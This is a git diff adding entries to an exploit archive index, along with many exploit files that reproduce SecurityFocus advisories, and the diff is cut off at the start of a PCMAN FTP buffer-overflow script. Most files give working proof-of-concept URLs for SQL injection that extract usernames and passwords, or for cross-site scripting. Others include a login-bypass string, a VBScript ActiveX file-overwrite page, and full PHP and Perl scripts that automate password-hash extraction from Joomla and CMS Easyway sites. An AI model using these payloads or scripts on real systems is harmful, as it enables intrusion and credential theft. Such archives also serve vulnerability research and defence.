diff --git a/files.csv b/files.csv index 1d512090f..9e839ef95 100755 --- a/files.csv +++ b/files.csv @@ -28579,6 +28579,7 @@ id,file,description,date,author,platform,type,port 31786,platforms/asp/webapps/31786.txt,"Cisco BBSM Captive Portal 5.3 'AccesCodeStart.asp' Cross-Site Scripting Vulnerability",2008-05-13,"Brad Antoniewicz",asp,webapps,0 31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal 'linking.page.php' SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0 31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 GetHttpResponse() - MITM Remote Code Execution Exploit",2014-02-20,"Julien Ahrens",windows,remote,0 +31789,platforms/windows/remote/31789.py,"PCMAN FTP 2.07 - Buffer Overflow Exploit",2014-02-20,Sumit,windows,remote,21 31790,platforms/hardware/webapps/31790.txt,"Barracuda Firewall 6.1.0.016 - Multiple Vulnerabilities",2014-02-20,Vulnerability-Lab,hardware,webapps,0 31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 ""CATV5_Backbone_Bus"" - Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555 31792,platforms/php/webapps/31792.txt,"Stark CRM 1.0 - Multiple Vulnerabilities",2014-02-20,LiquidWorm,php,webapps,80 @@ -28634,3 +28635,29 @@ id,file,description,date,author,platform,type,port 31843,platforms/asp/webapps/31843.txt,"Excuse Online 'pwd.asp' SQL Injection Vulnerability",2008-05-26,Unohope,asp,webapps,0 31844,platforms/php/webapps/31844.txt,"phpFix 2.0 fix/browse.php kind Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 31845,platforms/php/webapps/31845.txt,"phpFix 2.0 auth/00_pass.php account Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 +31846,platforms/php/webapps/31846.txt,"ClassSystem 2.0/2.3 HomepageTop.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 +31847,platforms/php/webapps/31847.txt,"ClassSystem 2.0/2.3 HomepageMain.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 +31848,platforms/php/webapps/31848.txt,"ClassSystem 2.0/2.3 MessageReply.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 +31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 class/ApplyDB.php Unrestricted File Upload Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0 +31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 post3/Book.asp review Parameter XSS",2008-05-26,Unohope,asp,webapps,0 +31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 post3/view.asp id Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 +31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 post3/book.asp review Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 +31853,platforms/windows/remote/31853.py,"Symantec Endpoint Protection Manager Remote Command Execution Exploit",2014-02-23,"Chris Graham",windows,remote,0 +31854,platforms/asp/webapps/31854.html,"The Campus Request Repairs System 1.2 'sentout.asp' Unauthorized Access Vulnerability",2008-05-26,Unohope,asp,webapps,0 +31855,platforms/php/webapps/31855.txt,"Tr Script News 2.1 'news.php' Cross-Site Scripting Vulnerability",2008-05-27,ZoRLu,php,webapps,0 +31856,platforms/windows/dos/31856.html,"CA Internet Security Suite 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2008-05-28,Nine:Situations:Group,windows,dos,0 +31857,platforms/php/webapps/31857.txt,"Joomla! and Mambo Artists Component 'idgalery' Parameter SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0 +31858,platforms/php/webapps/31858.txt,"Calcium 3.10/4.0.4 'Calcium40.pl' Cross Site Scripting Vulnerability",2008-05-28,"Marvin Simkin",php,webapps,0 +31859,platforms/asp/webapps/31859.txt,"JustPORTAL 1.0 'site' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0 +31860,platforms/asp/webapps/31860.txt,"Proje ASP Portal 2.0 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0 +31861,platforms/asp/webapps/31861.txt,"dvbbs 8.2 'login.asp' Multiple SQL Injection Vulnerabilities",2008-05-29,hackerbinhphuoc,asp,webapps,0 +31862,platforms/hardware/remote/31862.txt,"Xerox DocuShare 6 dsdn/dsweb/SearchResults URI XSS",2008-05-29,Doz,hardware,remote,0 +31863,platforms/hardware/remote/31863.txt,"Xerox DocuShare 6 dsdn/dsweb/Services/User URI XSS",2008-05-29,Doz,hardware,remote,0 +31864,platforms/hardware/remote/31864.txt,"Xerox DocuShare 6 docushare/dsweb/ServicesLib/Group URI XSS",2008-05-29,Doz,hardware,remote,0 +31865,platforms/asp/webapps/31865.txt,"DotNetNuke 4.8.3 'Default.aspx' Cross-Site Scripting Vulnerability",2008-05-30,"AmnPardaz Security Research Team",asp,webapps,0 +31866,platforms/php/webapps/31866.txt,"TorrentTrader Classic 1.x 'scrape.php' SQL Injection Vulnerability",2008-05-31,"Charles Vaughn",php,webapps,0 +31867,platforms/php/webapps/31867.php,"CMS Easyway 'mid' Parameter SQL Injection Vulnerability",2008-05-30,Lidloses_Auge,php,webapps,0 +31868,platforms/php/webapps/31868.txt,"OtomiGenX 2.2 'userAccount' Parameter SQL Injection Vulnerability",2008-06-02,hadihadi,php,webapps,0 +31869,platforms/asp/webapps/31869.txt,"i-pos Storefront 1.3 'index.asp' SQL Injection Vulnerability",2008-06-02,KnocKout,asp,webapps,0 +31870,platforms/php/webapps/31870.pl,"Joomla! and Mambo Joo!BB 0.5.9 Component 'forum' Parameter SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0 +31871,platforms/asp/webapps/31871.txt,"Te Ecard 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0 diff --git a/platforms/asp/webapps/31850.txt b/platforms/asp/webapps/31850.txt new file mode 100755 index 000000000..3fd2ef856 --- /dev/null +++ b/platforms/asp/webapps/31850.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29375/info + +Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected. + +http://www.example.com/post3/Book.asp?review= \ No newline at end of file diff --git a/platforms/asp/webapps/31851.txt b/platforms/asp/webapps/31851.txt new file mode 100755 index 000000000..d1f588985 --- /dev/null +++ b/platforms/asp/webapps/31851.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29375/info + +Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected. + +http://www.example.com/post3/view.asp?id=-99)+union+select+0,uid,password,3,4,5,6,7,8,9,10+from+user+where+1=(1 \ No newline at end of file diff --git a/platforms/asp/webapps/31852.txt b/platforms/asp/webapps/31852.txt new file mode 100755 index 000000000..e64358221 --- /dev/null +++ b/platforms/asp/webapps/31852.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/29375/info + +Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected. + +http://www.example.com/post3/book.asp?review=-99')+union+select+0,password,uid,3,4,5,6,7,8,9,10+from+user+where+1=1+union+select+*+From+公佈欄 +;+Where+'%'=(' \ No newline at end of file diff --git a/platforms/asp/webapps/31854.html b/platforms/asp/webapps/31854.html new file mode 100755 index 000000000..371532b98 --- /dev/null +++ b/platforms/asp/webapps/31854.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29376/info + +The Campus Request Repairs System is prone to an unauthorized-access vulnerability because it fails to adequately limit access to administrative scripts used for creating accounts. + +An attacker can exploit this vulnerability to gain unauthorized administrative access to the application; other attacks are also possible. + +The Campus Request Repairs System 1.2 is vulnerable; other versions may also be vulnerable. + +
user:
pass:
\ No newline at end of file diff --git a/platforms/asp/webapps/31859.txt b/platforms/asp/webapps/31859.txt new file mode 100755 index 000000000..db8c32cfe --- /dev/null +++ b/platforms/asp/webapps/31859.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/29426/info + +JustPORTAL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +JustPORTAL 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/lab/JustPORTALv1.0/panel/videogit.asp?site=1+union+select+0,(sifre),kullaniciadi,3,4,5+from+uyeler +http://www.example.com/lab/JustPORTALv1.0/panel/resimgit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler +http://www.example.com/lab/JustPORTALv1.0/panel/menugit.asp?site=1+union+select+0,sifre,kullaniciadi+from+uyeler +http://www.example.com/lab/JustPORTALv1.0/panel/habergit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler \ No newline at end of file diff --git a/platforms/asp/webapps/31860.txt b/platforms/asp/webapps/31860.txt new file mode 100755 index 000000000..ee7975770 --- /dev/null +++ b/platforms/asp/webapps/31860.txt @@ -0,0 +1,27 @@ +source: http://www.securityfocus.com/bid/29427/info + +Proje ASP Portal is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Proje ASP Portal 2.0.0 is vulnerable; other versions may also be affected. + +http://www.example.com/portal/yonetici/sayfalar.asp?islem=menuduzenle&id=3+union+select+0,kadi,sifre,3,4,5,6+from+uyeler +http://www.example.com/portal/yonetici/bloklar.asp?islem=bloklar&id=1+union+select+0,sifre,kadi,null,4,5+from+uyeler +http://www.example.com/portal/yonetici/chat.asp?islem=chat&id=1+union+select+0,sifre+from+uyeler +http://www.example.com/portal/yonetici/dostsiteler.asp?islem=dost&id=8+union+select+0,kadi,2,sifre+from+uyeler +http://www.example.com/portal/yonetici/dosya.asp?islem=dosyakategorisiduzenle&id=1+union+select+0,sifre,2,3+from+uyeler +http://www.example.com/portal/yonetici/dosya.asp?islem=dosyakategorisiduzenle&id=1+union+select+0,kadi,2,3+from+uyeler +http://www.example.com/portal/yonetici/haber.asp?islem=haber&id=1+union+select+0,1,2,kadi,sifre,5,6,7,8,9+from+uyeler +http://www.example.com/portal/yonetici/ilan.asp?islem=ilankategorisiduzenle&id=1+union+select+0,sifre,2,3+from+uyeler +http://www.example.com/portal/yonetici/oyun.asp?islem=oyunkategorisiduzenle&id=1+union+select+0,kadi+from+uyeler +http://www.example.com/portal/yonetici/oyun.asp?islem=oyunkategorisiduzenle&id=1+union+select+0,sifre+from+uyeler +http://www.example.com/portal/yonetici/resim.asp?islem=resimkategorisiduzenle&id=1+union+select+0,sifre+from+uyeler +http://www.example.com/portal/yonetici/resim.asp?islem=resimkategorisiduzenle&id=1+union+select+0,kadi+from+uyeler +http://www.example.com/portal/yonetici/toplist.asp?islem=toplistkategoriduzenle&id=1+union+select+0,sifre+from+uyeler +http://www.example.com/portal/yonetici/toplist.asp?islem=toplistkategoriduzenle&id=1+union+select+0,kadi+from+uyeler +http://www.example.com/portal/yonetici/video.asp?islem=videokategorisiduzenle&id=1+union+select+0,sifre+from+uyeler +http://www.example.com/portal/yonetici/video.asp?islem=videokategorisiduzenle&id=1+union+select+0,kadi+from+uyeler +http://www.example.com/portal/yonetici/yazi.asp?islem=yazialtkategoriduzenle&id=1+union+select+0,sifre,2,3+from+uyeler +http://www.example.com/portal/yonetici/yazi.asp?islem=yazialtkategoriduzenle&id=1+union+select+0,kadi,2,3+from+uyeler +http://www.example.com/portal/yonetici/uyeler.asp?islem=uyebilgi&id=1+union+select+0,1,2,3,4,sifre,kadi,7,8,1,1,1,1,1,1,9,1,0,1,1,1,1,1,1+from+uyeler \ No newline at end of file diff --git a/platforms/asp/webapps/31861.txt b/platforms/asp/webapps/31861.txt new file mode 100755 index 000000000..17434afee --- /dev/null +++ b/platforms/asp/webapps/31861.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/29429/info + +The 'dvbbs' program is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +These issues affect dvbbs 8.2; other versions may also be affected. + +http:///www.example.com/?password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253 +D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25 + + diff --git a/platforms/asp/webapps/31865.txt b/platforms/asp/webapps/31865.txt new file mode 100755 index 000000000..e8b6fd012 --- /dev/null +++ b/platforms/asp/webapps/31865.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29437/info + +DotNetNuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +DotNetNuke 4.8.3 is vulnerable; other versions may also be affected. + +http://www.example.com/Default.aspx/"onmouseover="x='al';x=x+'ert(/Soroush Dalili From WWW.BugReport.IR/)';eval(x);alert().aspx http://www.example.com/Default.aspx/bugreport/"onmouseover="var a='.aspx?';document.location='http://www.bugreport.ir/?archive'; \ No newline at end of file diff --git a/platforms/asp/webapps/31869.txt b/platforms/asp/webapps/31869.txt new file mode 100755 index 000000000..137e7893a --- /dev/null +++ b/platforms/asp/webapps/31869.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29471/info + +i-pos Storefront is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +i-pos Storefront 1.3 Beta is vulnerable; other versions may also be affected. + +http://www.example.com/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings \ No newline at end of file diff --git a/platforms/asp/webapps/31871.txt b/platforms/asp/webapps/31871.txt new file mode 100755 index 000000000..e7aaa4951 --- /dev/null +++ b/platforms/asp/webapps/31871.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/29478/info + +Te Ecard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/victim/lab/tecard/admin/pul.asp?gorev=duzenle&id=1+union+select+0,sifre,2+from+editor +http://www.example.com/victim/lab/tecard/admin/pul.asp?gorev=duzenle&id=1+union+select+0,kullanici_adi,2+from+editor +http://www.example.com/tecard/admin/card.asp?gorev=duzenle&id=99999+union+select+0x31,null,2,3,sifre,5,6,kullanici_adi,5,0+from+editor+where+id=1 +http://www.example.com/lab/tecard/admin/midi.asp?gorev=duzenle&id=1+union+select+0,1,kullanici_adi,3,4,sifre+from+editor +http://www.example.com/lab/tecard/admin/cat.asp?gorev=duzenle&id=1+union+select+kullanici_adi,1,sifre,3,4,5+from+editor +http://www.example.com/lab/tecard/admin/fon.asp?gorev=duzenle&id=1+union+select+0,sifre,2+from+editor +http://www.example.com/lab/tecard/admin/fon.asp?gorev=duzenle&id=1+union+select+0,kullanici_adi,2+from+editor \ No newline at end of file diff --git a/platforms/hardware/remote/31862.txt b/platforms/hardware/remote/31862.txt new file mode 100755 index 000000000..23a9113a8 --- /dev/null +++ b/platforms/hardware/remote/31862.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29430/info + +Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Xerox DocuShare 6 and prior versions are vulnerable. + +http://www.example.com/dsdn/dsweb/SearchResults/XSS \ No newline at end of file diff --git a/platforms/hardware/remote/31863.txt b/platforms/hardware/remote/31863.txt new file mode 100755 index 000000000..a47b24f59 --- /dev/null +++ b/platforms/hardware/remote/31863.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29430/info + +Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Xerox DocuShare 6 and prior versions are vulnerable. + +http://www.example.com/dsdn/dsweb/Services/User-XSS \ No newline at end of file diff --git a/platforms/hardware/remote/31864.txt b/platforms/hardware/remote/31864.txt new file mode 100755 index 000000000..cd64a23c0 --- /dev/null +++ b/platforms/hardware/remote/31864.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29430/info + +Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Xerox DocuShare 6 and prior versions are vulnerable. + +http://www.example.com/docushare/dsweb/ServicesLib/Group-#/XSS \ No newline at end of file diff --git a/platforms/php/webapps/31846.txt b/platforms/php/webapps/31846.txt new file mode 100755 index 000000000..e17d448b0 --- /dev/null +++ b/platforms/php/webapps/31846.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29372/info + +ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability. + +Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable. + +http://www.example.com/class/HomepageTop.php?teacher_id=-99'+union+select+0,1,teacher_password,teacher_account,4,5+from+teacher/* \ No newline at end of file diff --git a/platforms/php/webapps/31847.txt b/platforms/php/webapps/31847.txt new file mode 100755 index 000000000..9b9a80f76 --- /dev/null +++ b/platforms/php/webapps/31847.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29372/info + +ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability. + +Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable. + +http://www.example.com/class/HomepageMain.php?teacher_id=-99'+union+select+0,teacher_account,2,3,4,5,6,7,teacher_password+from+teacher/* \ No newline at end of file diff --git a/platforms/php/webapps/31848.txt b/platforms/php/webapps/31848.txt new file mode 100755 index 000000000..97aa96f0f --- /dev/null +++ b/platforms/php/webapps/31848.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29372/info + +ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability. + +Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable. + +http://www.example.com/class/MessageReply.php?teacher_id=1&message_id=-99'+union+select+teacher_account,teacher_password,3,4+from+teacher/* \ No newline at end of file diff --git a/platforms/php/webapps/31849.html b/platforms/php/webapps/31849.html new file mode 100755 index 000000000..f9fbe3da7 --- /dev/null +++ b/platforms/php/webapps/31849.html @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/29372/info + +ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability. + +Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable. + +
+ + +
+ +
\ No newline at end of file diff --git a/platforms/php/webapps/31855.txt b/platforms/php/webapps/31855.txt new file mode 100755 index 000000000..455bef68a --- /dev/null +++ b/platforms/php/webapps/31855.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29388/info + +Tr Script News is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Tr Script News 2.1 is vulnerable; other versions may also be affected. + +http://www.example.com/news/news.php?mode=voir&nb=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31857.txt b/platforms/php/webapps/31857.txt new file mode 100755 index 000000000..b78316677 --- /dev/null +++ b/platforms/php/webapps/31857.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29407/info + +The Artists component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + + +http://www.example.com/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+jos_users/* + diff --git a/platforms/php/webapps/31858.txt b/platforms/php/webapps/31858.txt new file mode 100755 index 000000000..2f043c6d9 --- /dev/null +++ b/platforms/php/webapps/31858.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29411/info + +Calcium is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Calcium 4.0.4 and 3.10 are vulnerable; other versions may also be affected. + +http://www.example.com/cgi-bin/Calcium40.pl?Op=ShowIt&CalendarName=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/31866.txt b/platforms/php/webapps/31866.txt new file mode 100755 index 000000000..6219c5598 --- /dev/null +++ b/platforms/php/webapps/31866.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/29451/info + +TorrentTrader Classic is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/scrape.php?info_hash=%22union%20select%201,1,1,1,ip%20from%20users--%20%20%20 \ No newline at end of file diff --git a/platforms/php/webapps/31867.php b/platforms/php/webapps/31867.php new file mode 100755 index 000000000..0c5274010 --- /dev/null +++ b/platforms/php/webapps/31867.php @@ -0,0 +1,61 @@ +source: http://www.securityfocus.com/bid/29461/info + +CMS Easyway is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + + php '.$argv[0].' http://www.site.com 1 +# +############################################################### +'); +if ($argc == 3) { +echo "\nExploiting in progress:"; +$url = $argv[1]; +$source = file_get_contents($url.'/index.php?mid=null+order+by+100/*'); +$errorcount = substr_count($source,'not a valid MySQL'); +$sql = '/index.php?mid=null+union+select+'; +for ($i = 25; $i>=1; $i--) { + $source = file_get_contents($url.'/index.php?mid=null+order+by+'.$i.'/*'); + if (substr_count($source,'not a valid MySQL')!=$errorcount) { + $errorcount2 = $i; + $i = 1; + } +} +for ($j=1; $j<$errorcount2; $j++) { + $sql = $sql.'concat(0x3a3a3a3a3a,login,0x3a3a313a3a,passwort,0x3a3a323a3a),'; +} +$sql = $sql.'concat(0x3a3a3a3a3a,login,0x3a3a313a3a,passwort,0x3a3a323a3a)+from+cms_benutzer+where+id='.$argv[2].'/*'; +$source = file_get_contents($url.$sql); +echo "\n"; +if (strpos($source,'::::')!=0) { + echo 'User: '.substr($source,strpos($source,'::::')+5,strpos($source,'::1::')-strpos($source,'::::')-5)."\n"; + echo 'Hash: '.substr($source,strpos($source,'::1::')+5,strpos($source,'::2::')-strpos($source,'::1::')-5)."\n"; +} else { + echo 'Exploit failed!'."\n"; +} +} else { +echo "\nNot enough arguments!\n"; +} +?> + + diff --git a/platforms/php/webapps/31868.txt b/platforms/php/webapps/31868.txt new file mode 100755 index 000000000..e0ca55ebe --- /dev/null +++ b/platforms/php/webapps/31868.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/29470/info + +OtomiGenX is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +OtomiGenX 2.2 is affected by this issue; other versions may also be vulnerable. + +The following example POST parameters are available to demonstrate this issue: + +userAccount: admin ' or 1=1/* +userPassword: +userType: Staff \ No newline at end of file diff --git a/platforms/php/webapps/31870.pl b/platforms/php/webapps/31870.pl new file mode 100755 index 000000000..d127fc59f --- /dev/null +++ b/platforms/php/webapps/31870.pl @@ -0,0 +1,137 @@ +source: http://www.securityfocus.com/bid/29475/info + +The Joo!BB component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Joo!BB 0.5.9 is vulnerable; other versions may also be affected. + +#!/usr/bin/perl +use LWP::UserAgent; +use Getopt::Long; + +if(!$ARGV[1]) +{ + print " +\n"; + print " +#############################################################\n"; + print " # Joomla Component Joo!BB Blind SQL Injection Exploit +#\n"; + print " # Author:His0k4 [ALGERIAN HaCkeR] +#\n"; + print " # +#\n"; + print " # Conctact: His0k4.hlm[at]gamil.com +#\n"; + print " # Greetz: All friends & muslims HacKeRs +#\n"; + print " # Greetz2: http://www.palcastle.org/cc :) +#\n"; + print " # +#\n"; + print " # Usage: perl jobb.pl host path +#\n"; + print " # Example: perl jobb.pl www.host.com /joomla/ -f 1 +#\n"; + print " # +#\n"; + print " # Options: +#\n"; + print " # -f Forum id +#\n"; + print " # Note: +#\n"; + print " # If you need to change the match value so do it :D +#\n"; + print " +#############################################################\n"; + exit; +} + +my $host = $ARGV[0]; +my $path = $ARGV[1]; +my $userid = 1; +my $fid = $ARGV[2]; + +my %options = (); +GetOptions(\%options, "u=i", "p=s", "f=i"); + +print "[~] Exploiting...\n"; + +if($options{"u"}) +{ + $userid = $options{"u"}; +} + +if($options{"f"}) +{ + $fid = $options{"f"}; +} + +syswrite(STDOUT, "[~] MD5-Hash: ", 14); + +for(my $i = 1; $i <= 32; $i++) +{ + my $f = 0; + my $h = 48; + while(!$f && $h <= 57) + { + if(istrue2($host, $path, $userid, $fid, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + if(!$f) + { + $h = 97; + while(!$f && $h <= 122) + { + if(istrue2($host, $path, $userid, $fid, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } +} + +print "\n[~] Exploiting done\n"; + +sub istrue2 +{ + my $host = shift; + my $path = shift; + my $uid = shift; + my $fid = shift; + my $i = shift; + my $h = shift; + + my $ua = LWP::UserAgent->new; + my $query = +"http://".$host.$path."index.php?option=com_joobb&view=forum&forum=".$fid." +and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 +),".$i.",1))=CHAR(".$h.")"; + + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } + + my $resp = $ua->get($query); + my $content = $resp->content; + my $regexp = "Announcements"; + + if($content =~ /$regexp/) + { + return 1; + } + else + { + return 0; + } + +} diff --git a/platforms/windows/dos/31856.html b/platforms/windows/dos/31856.html new file mode 100755 index 000000000..a2198c8ed --- /dev/null +++ b/platforms/windows/dos/31856.html @@ -0,0 +1,26 @@ +source: http://www.securityfocus.com/bid/29406/info + +A Computer Associates Internet Security Suite ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input. + +Successful exploits will compromise affected computers and will aid in further attacks. + +Internet Security Suite 2008 is vulnerable; other versions may also be affected. + + +<html><object classid='clsid:F13D3742-6C4F-4915-BF91-784BA02DD0BE' +id='UmxEventCliLib'/> +</object><script language='vbscript'> +filePath="..\..\..\..\..\..\..\boot.ini" +UmxEventCliLib.SaveToFile filePath +</script></html> + + diff --git a/platforms/windows/remote/31789.py b/platforms/windows/remote/31789.py new file mode 100755 index 000000000..ca9c1ca40 --- /dev/null +++ b/platforms/windows/remote/31789.py @@ -0,0 +1,66 @@ +# Exploit Title: PCMAN FTP 2.07 Long Command Buffer Overflow (unauthenticated) +# Date: Feb 19, 2014 +# 